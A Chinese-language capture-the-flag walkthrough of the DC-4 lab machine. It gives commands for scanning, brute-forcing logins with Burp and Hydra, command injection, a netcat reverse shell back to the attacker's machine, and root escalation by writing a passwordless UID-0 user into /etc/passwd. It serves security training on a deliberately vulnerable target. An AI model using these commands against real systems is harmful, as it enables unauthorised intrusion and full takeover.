1 信息收集
- 安装完成DC-4靶机后网络调成NAT模式,并运行
- 在kali机中使用arp扫描获取靶机的IP
命令:sudo arp-scan -l
- 根据获取到的IP打开网站
- 使用nmap获取到靶机的服务和操作系统信息
命令:sudo nmap -O -sV IP
- 使用dirsearch获取网站结构信息
命令:sudo dirsearch -u IP
- 可以使用AWVS对靶机IP进行扫描,查看相关信息
- 可以查看到网站结构和漏洞信息
2 使用Burpsuite破解密码
- 使用BP截获登录请求,转发到轰炸模块,高亮需要破解的内容,并设置载荷
- 破解后查看报文长度判断成功状态,获取密码happy
3 使用命令执行漏洞
- 使用BP拦截Run请求,查看内容,发现执行的是radio的内容
- 使用whoami查看权限
- 使用pwd查看当前所在的目录
- 对命令进行URL编码
- 将编码后的命令赋值给radio
4 使用反弹shell技术
- 在kali端监听1234端口
命令:nc -lnvp 1234
- 查看kali机的IP地址
- 对命令进行编码操作
命令:nc IP 1234 -e /bin/sh
- 赋值给radio并发送建立连接
返回kali端查看连接状态
使用python建立真正的shell访问终端
命令:python -c ‘import pty;pty.spawn(“/bin/bash”)’
5 使用Hydra协议爆破技术
- 进入到jim用户的backups目录下,查看到存在old-passwords.bak文件
- 将bak文件下载到kali机中
命令:python -m SimpleHTTPServer
- 访问IP:8000,下载文件
- 使用Hydra爆破密码
命令:
sudo hydra -l jim -P old-passwords.bak ssh://IP -vV
- 获取到jim的密码:jibril04
6 使用SSH登录系统
- 使用ssh登录到jim
命令:ssh jim@IP
- 查看用户目录下的mbox文件
- 查看/var/mail/jim文件内容获取到charles的密码:^xHhA&hvim0y
- 使用su登录用户charles
7 使用提权技术
- 进入到charles用户后使用sudo查看不需要密码就可以执行的命令
- 使用命令添加用户wjr,并使用su登录
命令:
echo ‘wjr::0:0:wjr,,,:/home/wjr:/bin/bash’ | sudo teehee -a /etc/passwd
- 具体参数解释如下
8 获取flag值
- 成功获取到/root文件夹中flag.txt中的内容
